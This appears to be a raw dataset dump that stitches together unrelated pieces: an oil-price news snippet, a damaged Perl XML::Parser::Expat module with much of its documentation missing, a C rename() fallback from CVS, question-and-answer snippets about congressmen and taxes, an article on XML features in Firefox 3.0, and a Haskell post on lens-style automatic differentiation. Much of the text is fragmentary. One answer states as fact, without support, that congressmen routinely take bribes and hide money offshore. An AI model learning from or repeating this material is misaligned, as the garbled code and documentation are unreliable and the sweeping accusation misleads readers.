type WAD' w w' a b = Lens'' (w,a) (w',b) type WAD'' w a b = WAD' w () a b -- terminate the weights for a closed network {- For any monoidal category we can construct this composition? -} -- horizontal composition hcompose :: forall w w' w'' w''' a b c. WAD' w' w'' b c -> WAD' w w''' a b -> WAD' (w',w) (w'',w''') a c hcompose f g = comp f' g' where f' :: Lens'' ((w',r),b) ((w'',r),c) f' = (first' swap') `comp` assoc'' `comp` (par' id' f) `comp` assoc' `comp` (first' swap') g' :: Lens'' ((r,w),a) ((r,w'''),b) g' = assoc'' `comp` (par' id' g) `comp` assoc' rotate :: WAD' w w' a b -> WAD' a b w w' rotate f = swap' `comp` f `comp` swap' -- vertical composition of weights vcompose :: WAD' w' w'' c d -> WAD' w w' a b -> WAD' w w'' (c, a) (d, b) vcompose f g = rotate (hcompose (rotate f) (rotate g) ) -- a double par. diagpar :: forall w w' a b w'' w''' c d. WAD' w w' a b -> WAD' w'' w''' c d -> WAD' (w,w'') (w',w''') (a, c) (b, d) diagpar f g = t' `comp` (par' f g) `comp` t where t :: Lens'' ((w,w''),(a,c)) ((w,a), (w'',c)) -- yikes. just rearrangements. t = assoc'' `comp` (second' ((second' swap') `comp` assoc' `comp` swap')) `comp` assoc' t' :: Lens'' ((w',b), (w''',d)) ((w',w'''),(b,d)) -- the tranpose of t t' = assoc'' `comp` (second' ( swap' `comp` assoc'' `comp` (second' swap'))) `comp` assoc' id''' :: WAD' () () a a id''' = id' -- rotate:: WAD' w a a w -- rotate = swap' liftIO :: Lens'' a b -> WAD' w w a b liftIO = second' liftW :: Lens'' w w' -> WAD' w w' a a liftW = first' wassoc' = liftW assoc' wassoc'' = liftW assoc'' labsorb'' :: WAD' ((),w) w a a labsorb'' = first' labsorb labsorb''' :: WAD' w ((),w) a a labsorb''' = first' labsorb' wswap' :: WAD' (w,w') (w',w) a a wswap' = first' swap' -- and so on we can lift all combinators
I wonder if this is actually nice?
I asked around and it seems like this idea may be what davidad is talking about when he refers to dioptics
Perhaps this will initiate a convo.
Edit: He confirms that what I’m doing appears to be a dioptic. Also he gave a better link
He is up to some interesting diagrams
Bits and Bobbles
- Does this actually work or help make things any better?
- Recurrent neural nets flip my intended role of weights and inputs.
- Do conv-nets naturally require higher dimensional diagrams?
- This weighty style seems like a good fit for my gauss seidel and iterative LQR solvers. A big problem I hit there was getting all the information to the outside, which is a similar issue to getting the weights around in a neural net. | https://www.philipzucker.com/neural-networks-with-weighty-lenses-dioptics/ | CC-MAIN-2021-43 | refinedweb | 1,457 | 64.88 |
Previewing ES6 Modules and more from ES2015, ES2016 and beyond
Chakra, the recently open-sourced JavaScript engine that powers Microsoft Edge and Universal Windows applications, has been pushing the leading edge of ECMAScript language support. Most of ES2015 (aka ES6) language support is already available in Edge, and last week’s Windows Insider Preview build 14342 brings more ES6 capabilities including modules, default parameters, and destructuring. We’re not stopping there – Edge also supports all ES2016 (aka ES7) proposals – the exponentiation operator and Array.prototype.includes – as well as future ECMAScript proposals such as Async Functions and utility methods like Object.values/entries and String.prototype.padStart/padEnd.
ES6 Modules
Modules let you write componentized and sharable code. Without complete support from any browser, developers have already started to get a taste of ES6 modules through transpiling from tools such as TypeScript or Babel. Edge now has early support for ES6 modules behind an experimental flag.
Modules aren’t exactly new to JavaScript with formats such as Asynchronous Module Definition (AMD) and CommonJS predating ES6. The key value of having modules built in to the language is that JavaScript developers can easily consume or publish modular code under one unified module ecosystem that spans both client and server. ES6 modules feature a straightforward and imperative-style syntax, and also have a static structure that paves the way for performance optimizations and other benefits such as circular dependency support. There are times when modules need to be loaded dynamically, for example some modules might only be useful and thus loaded if certain conditions are met in execution time. For such cases, there will be a module loader which is still under discussion in the standardization committee and will be specified/ratified in the future.
ES6 Modules in Microsoft Edge
To light up ES6 modules and other experimental JavaScript features in Edge, you can navigate to about:flags and select the “Enable experimental JavaScript features” flag.
The “Experimental JavaScript features” flag at about:flags
As a first step, Edge and Chakra now support all declarative import/export syntax defined in ES6 with the exception of namespace import/export (import * as name from “module-name” and export * from “module-name”). To load modules in a page, you can use the <script type=”module”> tag. Here is an example of using a math module:
[code language=”html”]
/* index.html */
…
<script type=’module’ src=’./app.js’>
…
[/code]
[code language=”javascript”]
/* app.js */
import { sum } from ‘./math.js’;
console.log(sum(1, 2));
/* math.js */
export function sum(a, b) { return a + b; }
export function mult(a, b) { return a * b; }
[/code]
Implementation: static modules = faster lookup
One of the best aspects of ES6’s modules design is that all import and export declarations are static. The spec syntactically restricts all declarations to the global scope in the module body (no imports/exports in if-statement, nested function, eval, etc.), so all module imports and exports can be determined during parsing and will not change in execution.
From an implementation perspective, Chakra takes advantage of the static nature in several ways, but the key benefit is to optimize looking up values of import and export binding identifiers. In Microsoft Edge, after parsing the modules, Chakra knows exactly how many exports a module declares and what they are all named, Chakra can allocate the physical storage for the exports before execution. For an import, Chakra resolves the import name and create a link back to the export it refers to. The fact that Chakra is aware of the exact physical storage location for imports and exports allows it to store the location in bytecode and skip dynamically looking up the export name in execution. Chakra can bypass much of the normal property lookup and cache mechanisms and instead directly fetch the stored location to access imports or exports. The end result is that working with an imported object is faster than looking up properties in ordinary objects.
Going forward with modules
We have taken an exciting first step to support ES6 modules. As the experimental status suggests, the work towards turning ES6 modules on by default in Edge is not fully done yet. Module debugging in the F12 Developer Tools is currently supported in internal builds and will be available for public preview soon. Our team is also working on namespace import/export to have the declarative syntax fully supported and will look into module loader once its specification stabilizes. We also plan to add new JSRT APIs to support modules for Chakra embedders outside of Edge.
More ES6 Language Features
Microsoft Edge has led the way on a number of ES6 features. Chakra has most of ES6 implemented and on by default including the new syntax like let and const, classes, arrow functions, destructuring, rest and spread parameters, template literals, and generators as well as all the new built-in types including Map, Set, Promise, Symbol, and the various typed arrays.
In current preview builds, there are two areas of ES6 that are not enabled by default – well-known symbols and Proper Tail Calls. Well-known symbols need to be performance optimized before Chakra can enable them – we look forward to delivering this support in an upcoming Insider flight later this year.
The future of Proper Tail Calls, on the other hand, is somewhat in doubt – PTC requires a complex implementation which may result in performance and standards regressions in other areas. We’re continuing to evaluate this specification based on our own implementation work and ongoing discussions at TC39.
ES2016 & Beyond with the New TC39 Process
TC39, the standards body that works on the ECMAScript language, has a new GitHub-driven process and yearly release cadence. This new process has been an amazing improvement so far for a number of reasons, but the biggest is that it makes it easier for implementations to begin work early for pieces of a specification that are stable and specifications are themselves much smaller. As such, Chakra got an early start on ES2016 and are now shipping a complete ES2016 implementation. ES2016 was finalized (though not ratified) recently and includes two new features: the exponentiation operator and Array.prototype.includes.
The exponentiation operator is a nice syntax for doing
Math.pow and it uses the familiar
** syntax as used in a number of other languages. For example, a polynomial can be written like:
[code language=”javascript”]let result = 5 * x ** 2 – 2 * x + 5;[/code]
Certainly a nice improvement over Math.pow, especially when more terms are present.
Chakra also supports Array.prototype.includes which is a nice ergonomic improvement over the existing Array.prototype.indexOf method. Includes returns
true or
false rather than an index which makes usage in Boolean contexts lots easier.
includes also handles NaN properly, finally allowing an easy way to detect if NaN is present in an array.
Meanwhile, the ES2017 specification is already shaping up and Chakra has a good start on some of those features as well, namely Object.values and entries, String.prototype.padStart and padEnd, and SIMD. We’ve blogged about SIMD in the past, though recently Chakra has made progress in making SIMD available outside of asm.js. With the exception of Object.values and entries, these features are only available with experimental JavaScript features flag enabled.
Object.values & Object.entries are very handy partners to Object.keys. Object.keys gets you an array of keys of an object, while Object.values gives you the values and Object.entries gives you the key-value pairs. The following should illustrate the differences nicely:
[code language=”javascript”]let obj = { a: 1, b: 2 };
Object.keys(obj);
// [ ‘a’, ‘b’ ]
Object.values(obj);
// [1, 2]
Object.entries(obj);
// [ [‘a’, 1], [‘b’, 2] ]
[/code]
String.prototype.padStart and String.prototype.padEnd are two simple string methods to pad out the left or right side of a string with spaces or other characters. Not having these built-in has had some rather dire consequences recently as a module implementing a similar capability was removed from NPM. Having these simple string padding APIs available in the standard library and avoiding the additional dependency (or bugs) will be very helpful to a lot of developers.
Chakra is also previewing SIMD, with the entire API surface area in the stage 3 SIMD proposal completed, as well as a fully-optimized SIMD implementation integrated with asm.js. We are eager to hear feedback from you on how useful these APIs are for your programs.
You can try ES2015 modules and other new ES2015, ES2016, and beyond features in Microsoft Edge, starting with the latest Windows Insider Preview and share your thoughts and feedback with us on Twitter at @MSEdgeDev and @ChakraCore or file an issue on the ChakraCore GitHub. We look forward to hearing your input!
― Taylor Woll, Software Engineer
― Limin Zhu, Program Manager
― Brian Terlson, Program Manager | https://blogs.windows.com/msedgedev/2016/05/17/es6-modules-and-beyond/ | CC-MAIN-2020-24 | refinedweb | 1,479 | 52.8 |
Hey,
I have a couple of c# scripts with custom classes in them in my scene. Each one of those also has an editor extension. So far it works pretty good. But when I change small things in the code and then build/debug the code in Monodevelop it looses the values I entered previously in the editor.
my script is something like this:
public class myScript
{
public int valueA;
public int[] valuesOfA;
public class myClass
{
public int insideClassA;
public int[] insideClassValuesOfA;
}
myClass myClassVariable = new myClass();
}
so if I assign the values myClassVariable.insideClassA, then they will disappear after the build/debug. But if I assign valueA, which is outside the class it will be saved. I don't quite get why it keeps getting deleted...
myClassVariable.insideClassA
valueA
where are you assigning values to insideClassA?
insideClassA
Answer by cregox
·
Nov 14, 2014 at 04:09 PM
You definitely should go for some video tutorials, as there's a lot to learn there.
There are 2 typical ways of losing "variable" values:
If you assign values on the editor while playing, they will be lost when you stop playing.
And if you have values assigned on the script declaration, they will be overwritten by editor values.
Those are a few points covered on tutorials, I believe.
Seriously I don't think I need to watch more video tutorials. I don't mean hit Run inside Unity. I'm well aware that changes in Playtime won't get saved. That's not what I'm talking about. I mean the compilation of $$anonymous$$onodevlop.
As when I usually assign a value inside a custom Inspector (values which are not inside the editor extension script but inside the "base" script) then those values will remain even if I recompile the script, as long as I don't delete that variable inside the script.
So I would expect the same behavior if I use a custom class which as far as I know mostly behaves like a container of different variables.
I only mean your question evidently shows basic doubts that is everywhere. When it gets into a video tutorial, it means it's asked a lot. And asking "the internet" repeated questions is usually the worst way to go.
For a few amenities: I took the liberty to move your "answer" as a proper comment to my answer, as it clearly was the intention. Also there's no special name (such as "custom") for classes you create. They're still classes.
Finally, if you think you can't find your answer anywhere, you should ask it in a much more clear way. I, for one, did try to help with what I could understand from your question. Some people here are much better than me for understanding what newbies mean in general, maybe you get lucky if they see your question and find enough will to answer it. Try giving steps to reproduce the problem. Sometimes when you do this, you can find the answer just while preparing the question properly.
We can't assign values to an inner class in the editor / inspector. In my experience, compiling, be it on Unity or $$anonymous$$onodevelop (which I only use for debugging, eventually) never ever "deleted" variable values anywhere. And you didn't answer my very basic question I commented in your question. I find it too hard to understand what you mean, if none of what I mentioned already.
$$anonymous$$aybe you do mean monodevelop debugging, though and I just haven't stumbled into that bug. That process is full of bugs from my brief experience. $$anonymous$$aybe it is something you're doing wrong without realizing... If it is within monodevelop, though, I agree it might be hard to find an answered question there.
Answer by razcrux
·
Apr 14, 2016 at 05:10 AM
@fred_gds
The answer you are looking for is you need to add:
[System.Serializable]
Above class variables if you want the editor to retain them when you.
A node in a childnode?
1
Answer
UnityScript auto-format?
0
Answers
How to write a shortcut for MonoDevelop editor?
1
Answer
Modify inspector
2
Answers
Editor Compiling New Changes
2
Answers | https://answers.unity.com/questions/831718/custom-classes-deleted-on-builddebug.html | CC-MAIN-2021-10 | refinedweb | 702 | 64.71 |
In this tutorial, we are going to build a simple but beautiful CRUD application using the Python Web Development Framework called Django.Installations and Setting Up Django
If you would like to do this project in a virtual environment, I’m sure there are many tutorials to help you create one. After you have created a virtual environment, proceed with this tutorial. If you do not care about virtual environment stuffs, also proceed.
$ pip install Django==2.0.5
2. Verify the Django version installed by running the command below:
$ django-admin --version
$ mkdir django_projects
2. Move into this directory with
cd django_projects
3. Create the project with
$ django-admin startproject CRUD $ cd CRUD
4. Run the development server
$ python manage.py runserver
You should see something like this
5. Navigate to on your browser and you should see something like this:
Congratulations!!!! You are now ready to start building the CRUD appBuilding the CRUD APP
Let us create an app called Crud in the CRUD project. Close the development server with Ctrl + C
Create the app with
$ python manage.py startapp Crud
So far, we have a directory structure like this
Open the settings.py file to specify the allowed hosts as well as add the Crud app to installed apps. You should have something like the below:
The Post Model
For our Crud app, we would like to be able to Create, Modify, View and Delete a post. Let us now define a post model in our models.py file. Open the models.py file in your favorite text editor and paste the below codes:
from django.db import models class Post(models.Model): title = models.CharField(max_length=120, help_text='title of message.') message = models.TextField(help_text="what's on your mind ...")
def str(self):
return self.title
Our post has a title and a message as fields.
Make Migrations
Run the commands below to make migrations:
$ python manage.py makemigrations
$ python manage.py migrate
Superuser
Let us now create a superuser to manage our application
Run the following in the terminal:
$ python manage.py createsuperuser
You will be prompted to enter a username, email address, password and password confirmation. If the superuser is successfully created, we can now run the development server and log on to the Django admin page. Run the development server with
$ python manage.py runserver
Navigate to on your browser and you should see something similar as below:
Enter the details to log in.
You should see a page similar to that below:
Our post is not displayed here since we have not registered it in the admin.
Open the admin.py file in a text editor and add the following codes:
from django.contrib import admin
from .models import Post #add this to import the Post model
admin.site.register(Post) #add this to register the Post model
Refresh the page again and this time you should see the post appear as below Python and Django Full Stack Web Developer Bootcamp
☞ Build a Backend REST API with Python & Django - Advanced
☞ Python Django Dev To Deployment
☞ Build Your First Python and Django Application
☞ How To Set Up Django with Postgres, Nginx, and Gunicorn on Ubuntu 16.04
☞ Building a Universal Application with Nuxt.js and Django
☞ Django Tutorial: Building and Securing Web Applications
☞ Building a Weather App in Django
Originally published on
🔥Intellipaat Django course: 👉This Python Django tutorial will help you learn what is django web development &....
This article is a definitive guide for starters who want to develop projects with RESTful APIs using Python, Django and Django Rest Framework.
This article is a definitive guide for starters who want to develop projects with RESTful APIs using Python, Django and Django Rest Framework.Introduction": "{/other_user}", "gists_url": "{/gist_id}", "starred_url": "{/owner}{/repo}", "subscriptions_url": "", "organizations_url": "", "repos_url": "", "events_url": "{/privacy}",
REST APIs with Django Rest FrameworkREST APIs with Django Rest Framework
$ python manage.py migrate
The' ]
Since we haven't setup our
POST requests yet, we will be populating the database through django's admin panel.
To do that, create a superuser account
admin with password
1234password.
$ python manage.py createsuperuser --email [email protected] -:
POST /api/v1/posts/create/!Source! | https://morioh.com/p/16d8613eba4e | CC-MAIN-2020-05 | refinedweb | 693 | 57.16 |
#Car #Stock #Photos API with bulk download option
CarImagery.com is a website that gives business’ in the auto trade industry access to thousands of quality, licensed stock photos of cars. To spruce up catalogue pages with glossy images of cars.
For $19.99 per month, you get unlimited access to an API, that will look up car images, and return one to you based on your search criteria, or if you prefer to hold the data locally on your own server, you can download our 100MB database of car imagery and data. You can preview a sample of it on the website. – This is updated every 6 months to account for new cars entering the market.
There is a free version to try out, but it is not licensed for commercial or educational use, and will block excessive usage.
For .NET developers, here’s some sample code:
Open a new project in Visual Studio, in this case, we are assuming a console application, but the steps are identical for other project types too.
● Right click on the project, and select Add > Service Reference
● Change the namespace to CarImagery
● Enter the address into the address bar.
● Press OK.
● Enter the following code in the Main() method
var carImagery = new CarImagery.apiSoapClient(“apiSoap”);
var strUrl = carImagery.GetImageUrl(“Ford Fiesta”); System.Diagnostics.Process.Start(strUrl);
● Press Run, and your default browser will open with an image of a Ford Fiesta car. | https://blog.dotnetframework.org/2016/11/09/car-stock-photos-api-with-bulk-download-option/ | CC-MAIN-2018-30 | refinedweb | 239 | 62.17 |
JDK 1.1 provides the basic technology for loading and authenticating
signed classes. This enables browsers to run trusted applets in a
trusted environment. This does not make obselete the need to run
untrusted applets in a secure way. In the release following JDK 1.1,
we will provide tools for finer-grained control of flexible security
policies.
See the chronology page to
check on the status of security-related bugs.
There are other specific capabilities denied to applets loaded
over the net, but most of the applet security policy is described by
those two paragraphs above. Read on for the gory details.
In Java-enabled browsers, untrusted applets cannot read or write files at
all. By default, downloaded applets are considered untrusted. There are
two ways for an applet to be considered trusted: the applet is installed
on the client's local disk, in a directory on the client's CLASSPATH, or
the applet is digitally signed by an identity the client has marked as
trusted.
Sun's appletviewer allows applets to read files that reside in
directories on the access control lists.
If the file is not on the client's access control list, then applets
cannot access the file in any way. Specifically, applets cannot check for
the file's existence, read or write the file, rename or delete it, list
the directory that contains it, or check its type, size, or modification
time.
Applets loaded into a Java-enabled browser can't read files.
Sun's appletviewer allows applets to read files that are named on the
access control list for reading. The access control list for reading
is null by default, in the JDK. You can allow applets
to read directories or files by naming them in the
acl.read property in your
~/.hotjava/properties file.
Note: The "~" (tilde) symbol is used on UNIX
systems to refer to your home directory. If you install a web browser
on your F:\ drive on your PC, and create a top-level
directory named .hotjava, then your properties file is
found in F:\.hotjava\properties.
For example, to allow any files in the directory home/me
to be read by applets loaded into the appletviewer, add this line to
your ~/.hotjava/properties file.
acl.read=/home/me
You can also name a single file, or several entries separated by colons:

acl.read=/home/me/somedir/somefile
acl.read=/home/foo:/home/me/somedir/somefile

The acl.write property works the same way for files applets may write:

acl.write=/home/me/somedir/somefile
acl.write=/tmp:/home/me/somedir/somefile
Bear in mind that if you open up your file system for writing by
applets, there is no way to limit the amount of disk space an applet
might use.
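The ACL lookup described above can be sketched in plain Java. This is not Sun's implementation: the AclCheck class name is invented here, and only the colon-separated format shown in the examples above is assumed. A path is permitted when it equals an entry or lies beneath a directory entry.

```java
import java.util.Arrays;
import java.util.List;

// Toy model of the appletviewer's access-control check. Both lists are
// empty by default, so every request is refused until the user opts in.
class AclCheck {
    private final List<String> readable;
    private final List<String> writable;

    AclCheck(String aclRead, String aclWrite) {
        // Properties such as acl.read=/home/foo:/home/me use ':' between entries.
        this.readable = split(aclRead);
        this.writable = split(aclWrite);
    }

    private static List<String> split(String prop) {
        return (prop == null || prop.isEmpty())
                ? List.of()
                : Arrays.asList(prop.split(":"));
    }

    boolean canRead(String path)  { return matches(readable, path); }
    boolean canWrite(String path) { return matches(writable, path); }

    private static boolean matches(List<String> acl, String path) {
        // An entry names either the file itself or a directory prefix.
        for (String entry : acl) {
            if (path.equals(entry) || path.startsWith(entry + "/")) {
                return true;
            }
        }
        return false;
    }
}
```

With acl.read=/home/me, a request for /home/me/notes.txt succeeds while /etc/passwd is refused; with both properties unset, everything is refused.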
In both Java-enabled browsers and the appletviewer, applets can read
these system properties by invoking
System.getProperty(String key):
key                 meaning
____________        ______________________________
java.version        Java version number
java.vendor         Java vendor-specific string
java.vendor.url     Java vendor URL
java.class.version  Java class version number
os.name             Operating system name
os.arch             Operating system architecture
os.version          Operating system version
file.separator      File separator (eg, "/")
path.separator      Path separator (eg, ":")
line.separator      Line separator
By default, applets cannot read these system properties:

key                 meaning
____________        _____________________________
java.home           Java installation directory
java.class.path     Java classpath
user.name           User account name
user.home           User home directory
user.dir            User's current working directory
To read a system property from within an applet, invoke
System.getProperty(key). For example,
String s = System.getProperty("os.name");
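The same call can be exercised for each permitted key in a standalone program, where no security manager intervenes; inside a browser, asking for a forbidden key would raise a SecurityException instead. The key list below is taken directly from the table above.

```java
// Print the ten system properties that applets are permitted to read.
class ReadableProps {
    static final String[] ALLOWED = {
        "java.version", "java.vendor", "java.vendor.url", "java.class.version",
        "os.name", "os.arch", "os.version",
        "file.separator", "path.separator", "line.separator"
    };

    public static void main(String[] args) {
        for (String key : ALLOWED) {
            // Outside an applet sandbox, every one of these lookups succeeds.
            System.out.println(key + " = " + System.getProperty(key));
        }
    }
}
```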
There's no way to hide the above ten system properties from applets.
There's no way to allow an applet loaded into a Java-enabled browser
to read system properties that they aren't allowed to read by default.
To allow applets loaded into the appletviewer to read the property
named by key, add the property
key.applet=true to your ~/.hotjava/properties
file. For example, to allow applets to record your user name, add
this line to your ~/.hotjava/properties file:
user.name.applet=true
Applets loaded over the net can open network connections only to the host
they came from: the host named by the codebase attribute of the applet
tag or, if no codebase attribute is given, the host of the HTML page
itself.
For example, if you try to do this from an applet that did not
originate from the machine foo.com, it will fail with a security
exception:
Socket s = new Socket("foo.com", 25, true);
Be sure to name the originating host exactly as it was specified when
the applet was loaded into the browser.
That is, if you load an HTML page using a URL on the host foo.state.edu,
an applet on that page must open its connections to foo.state.edu exactly
as written, not to an abbreviated name such as foo, even if both names
reach the same machine.
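The exact-match rule can be sketched as a literal string comparison on the host name, with no DNS resolution, which is precisely why foo and foo.state.edu are treated as different hosts even when they name the same machine. The HostCheck class below is a hypothetical stand-in, not the browser's actual check.

```java
// Simplified model of the host restriction: a connection is allowed only
// when the requested host matches the originating host character for
// character.
class HostCheck {
    private final String originHost;  // host the applet was loaded from

    HostCheck(String originHost) {
        this.originHost = originHost;
    }

    // Mimics the security manager's veto: throw on any mismatch.
    void checkConnect(String requestedHost) {
        if (!originHost.equals(requestedHost)) {
            throw new SecurityException(
                "applet may only connect back to " + originHost);
        }
    }
}
```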
There is no explicit support in the JDK applet API for persistent
state on the client side. However, an applet can maintain its own
persistent state on the server side. That is, it can create files on
the server side and read files from the server side.
No, applets loaded over the net are not allowed to start programs on the
client. That is, an applet that you visit can't start some rogue
process on your PC. In UNIX terminology, applets are not allowed to
exec or fork processes. In particular, this means that applets can't
invoke some program to list the contents of your file system, and it
means that applets can't invoke System.exit() in an attempt to kill
your web browser. Applets are also not allowed to manipulate threads
outside the applet's own thread group.
    class Parent { protected int x; }
    class Child extends Parent { ... }
For example, programmers can choose to implement sensitive functions
as private methods. The compiler and the runtime checks ensure that
no objects outside the class can invoke the private methods.
There are two different ways that applets are loaded by a Java system.
The way an applet enters the system affects what it is allowed to do.
If an applet is loaded over the net, then it is loaded by the applet
class loader, and is subject to the restrictions enforced by the applet
security manager.
If an applet resides on the client's local disk, and in a directory
that is on the client's CLASSPATH, then it is loaded by the file
system loader. The most important differences are
Java-enabled browsers use the applet class loader to
load applets specified with file: URLs. So, the restrictions and
protections that accrue from the class loader and its associated
security manager are now in effect for applets loaded via file: URLs.
This means that if you specify the URL like so:
Location: file:/home/me/public_html/something.html
Applets loaded over the net are loaded by the applet class loader.
For example, the appletviewer's applet class loader is implemented by
the class sun.applet.AppletClassLoader.
The class loader enforces the Java name space hierarchy. The class
loader guarantees that a unique namespace exists for classes that come
from the local file system, and that a unique namespace exists for
each network source. When a browser loads an applet over the net,
that applet's classes are placed in a private namespace associated
with the applet's origin. The verifier examines the class file for
purposeful violations of the language type rules and name space
restrictions.
The verifier accomplishes that by doing a data-flow analysis of the
bytecode instruction stream, along with checking the class file
format, object signatures, and special analysis of
finally clauses that are used for Java exception
handling.
Details on the verifier's design and
implementation were presented in a paper by Frank Yellin at the
December 1995 WWW conference in Boston.
A web browser uses only one class loader, which is established
at start-up. Thereafter, the system class loader cannot
be extended, overloaded, overridden or replaced. Applets cannot
create or reference their own class loader.
The applet security manager is the Java mechanism for enforcing the
applet restrictions described above. The appletviewer's applet
security manager is implemented by sun.applet.AppletSecurity.
A browser may only have one security manager. The security manager is
established at startup, and it cannot thereafter be replaced,
overloaded, overridden, or extended. Applets cannot create or
reference their own security manager.
The following table is not an exhaustive list of applet capabilities.
It's meant to answer the questions we hear most often about what
applets can and cannot do.
Key:
                           Stricter ------------------------> Less strict
                                       NN    NL    AN    AL    JS

read file in /home/me,                 no    no    no    yes   yes
  acl.read=null
read file in /home/me,                 no    no    yes   yes   yes
  acl.read=/home/me
write file in /tmp,                    no    no    no    yes   yes
  acl.write=null
write file in /tmp,                    no    no    yes   yes   yes
  acl.write=/tmp
get file info,                         no    no    no    yes   yes
  acl.read=null
  acl.write=null
get file info,                         no    no    yes   yes   yes
  acl.read=/home/me
  acl.write=/tmp
delete file,                           no    no    no    no    yes
  using File.delete()
delete file,                           no    no    no    yes   yes
  using exec /usr/bin/rm
read the user.name property            no    yes   no    yes   yes
connect to port on client              no    no    no    yes   yes
connect to port on 3rd host            no    no    no    yes   yes
load library                           no    yes   no    yes   yes
exit(-1)                               no    no    no    yes   yes
create a popup window                  no    yes   no    yes   yes
  without a warning
The server is also known as the originating host.
The terms server and client are sometimes used to refer
to computers, and are sometimes used to refer to computer programs.
For example, the machine an applet was served from is a server, and the httpd process running on it is its server process. My computer at home is a client,
and the web browser running on my computer at home acts as the client
process. | http://java.sun.com/sfaq/ | crawl-001 | refinedweb | 1,547 | 57.47 |
japanese did not fall in love, they are just being made abjectly submissive to the conqueror.
.
like breaking or domesticating an animal, you'd have to whip them and give them goody bags to train them into submission.
.
that's why people should treat their defeated but unrepentant, wartime war-crime-awashed enemy by taking no prisoners and instead treating them as second-class people; then and only then will they 'fall in love' with you. but always watch your back in the middle of sleep; Pearl Harbour may be just around the corner.
The addition to the globally available Chinese labour force is not by any means over; as people migrate from the land (where their income is very low) to second and third tier cities, Chinese incomes will continue to rise, driven by urbanisation as well as productivity growth.
As productivity growth remains high (17% in the private sector a couple of years ago), incomes will continue to rise. Infrastructure is likely to continue to be better than in a lot of South and South East Asia.
The jobs which will go to Bangladesh and Vietnam will be the very low paid ones which require only a sewing machine (or similar) as capital investment. Industries like Autos and electronics which have complex supply chains and a need for scale will continue to grow in China. China will still have a labour force of nearly a billion. The only real labour shortage will be for very low paying jobs which will either move into the Chinese countryside or to the Indian subcontinent (or SE Asia).
This does not mean the Chinese economy will collapse or become uncompetitive, only that development will continue and really low wage jobs will migrate. China will really only have a serious problem if productivity growth stagnates (unlikely until the economy becomes a lot more urbanised)or investment ceases to make a decent return (which may happen without further reforms).
By the year 2020 twenty million Chinese men will face a shortage of women for marriage. They are already trying to import girls from such countries as Myanmar illegally; it will not help much. The number of workers available will worsen further after, say, 40 years, while rich young boys and girls are emigrating abroad at a rate of 70 thousand per month!
but however you twist and cut it, it does not change the fact reminding the world that japan is still a vassal slave state with foreign troops and bases stationed all over japan. japanese are still treated as second class citizens at best in their own country by the occupying troops.
.
china may or may not have labour shortage problems in the future, but in order for japan to be independent and free, it must let the ryukyus islands be independent and free first.
.
only by letting the ryukyus be free will the asian nations china, india and korea lend a hand to rescue japan with money loans and more trade.
Well, this article is a bit overreacting. China's working population has been abnormally high and now it is time to shrink. Why is it such a big deal for a country with already more than 1.3 billion people? Look on the bright side. I can say that population decline is a positive thing since each worker can become more efficient than before.
"Never before has the global economy benefited from such a large addition of human energy."
Stopped reading right there. The author shows an extreme lack of understanding of any real "benefit" to the world economy from the hollowing out of the US's and EU's industrial labor force at the expense of near-slave-wage labor from China.
I should have known better than to expect anything of real substance about China from The Economist, or most western based rags in the first place.
Michael Pettis is a much more reliable source of info on what's actually going on in China.

It is good news in a way. However, I have to say this is a test for China, examining the pension system and health system. Please also note that there will be two working people supporting four elderly people. Anyone who knows Japan deeply will notice that the elderly have become a major social problem there; this is also one reason for Japan's slow economic growth.
It is not the number of working people that matters but the quality of the work force that does. Only Indian nationalists, like the Rajs of old, will talk endlessly about their country's "population dividend" as if half a billion uneducated people stuck in poverty are going to build the next superpower.
A slowly declining labor pool at this point is good news. China is already suffering serious environmental consequences of breakneck industrialization sustained by the need to maintain social stability through job creation. The decreasing number of youth entering the labor force will give the policy makers the needed slack to transition the economy away from the present mix of manufacturing/infrastructure/housing into a more sustainable mix. As long as productivity increases, the economy can keep on growing.
On the flip side of this is the long term 4-2-1 problem regarding retirement and pensions. I feel the policy response to this is to abolish the 1 child policy or at least change it to a regional quota. Provinces like Tibet should have no limit on the number of children regardless of ethnicity, while coastal provinces could have a ceiling of 2 kids per family.
This is the whole point of the 1-child policy isn't it? Allowing each family to pool all their resources into 1 child's education?
I think Chinese workers' productivity have far more impact on the world's economy than the total number in the labor force, a few hundred million competing knowledge workers is not going to be nearly as beneficial to western economies as a hundred million low cost labor.
The point of the one child policy was a fear of over-population. I was going to say some long-winded thing about productivity, but, in a nutshell, it really all depends.
I also agree that this (NBS data) shrinking of 3.45 m out of about 1 billion labor force in china is good news.
.
as chinese government is re-prioritising its industry with more emphasis on education, greenhouse gas emission reduction and productivity, chinese workers will be more educated, efficient, productive, healthier and richer. each worker decades later can support far more retirees and disabled than s/he can today.
.
chinese population will grow older, as every nation does with a growing economy, but they will also be healthier, richer and more prosperous.
.
this 'getting old before getting rich' nonsense is maliciously intended, no chinese in his/her right mind should buy that.
China's high proportional growth rates are due to coming from a very low GDP/ capita base. In absolute terms (additional GDP/ capita in dollar terms), China has grown less quickly in the past decade than many other countries.
.
E.g. while in PPP 2005 dollars, China added $4,550 to per capita GDP between 2001 and 2011, absolute growth was higher in Poland, Slovakia, Czech Republic, Turkey, Estonia, Lithuania, Latvia, Sweden, Russia and South Korea.
.
---------------------
While it is true that China retains plenty of space for productivity catch up & rising incomes, and this will allow China's elderly to enjoy higher living standards than today, it's important to realise that China's current proportional growth rate will fall in the coming decades (absolute growth in per person incomes will not rise much above East European levels for the foreseeable future).
.
Already, scarcity of cheap labour, scarcity of land, scarcity of fresh water and scarce capacity of the environment to endure industrial activity is constraining potential for further volume-based investment and growth - China's economy has to pivot & reform, rather than simply scaling up. As that happens, investment returns will diminish and rates of capital accumulation will fall.
.
China will have a much richer future to look forward to, and will make a great contribution to the world. But it's important to keep everything in perspective. | http://www.economist.com/comment/1851971 | CC-MAIN-2014-49 | refinedweb | 1,377 | 57.91 |
Errors:
The problems:

Code:
------ Build started: Project: io, Configuration: Debug Win32 ------
Compiling...
io.cpp
k:\program files\io\io\io\Form1.h(320) : warning C4441: calling convention of '__stdcall ' ignored; '__clrcall ' used instead
k:\program files\io\io\io\Form1.h(321) : warning C4441: calling convention of '__stdcall ' ignored; '__clrcall ' used instead
Linking...
io.obj : error LNK2020: unresolved token (06000004) io.Form1::Inp32
io.obj : error LNK2020: unresolved token (06000005) io.Form1::Out32
K:\Program files\io\io\Debug\io.exe : fatal error LNK1120: 2 unresolved externals
Build log was saved at ":\Program files\io\io\io\Debug\BuildLog.htm"
io - 3 error(s), 2 warning(s)
========== Build: 0 succeeded, 1 failed, 0 up-to-date, 0 skipped ==========
1. I can not get inpout32 to work.
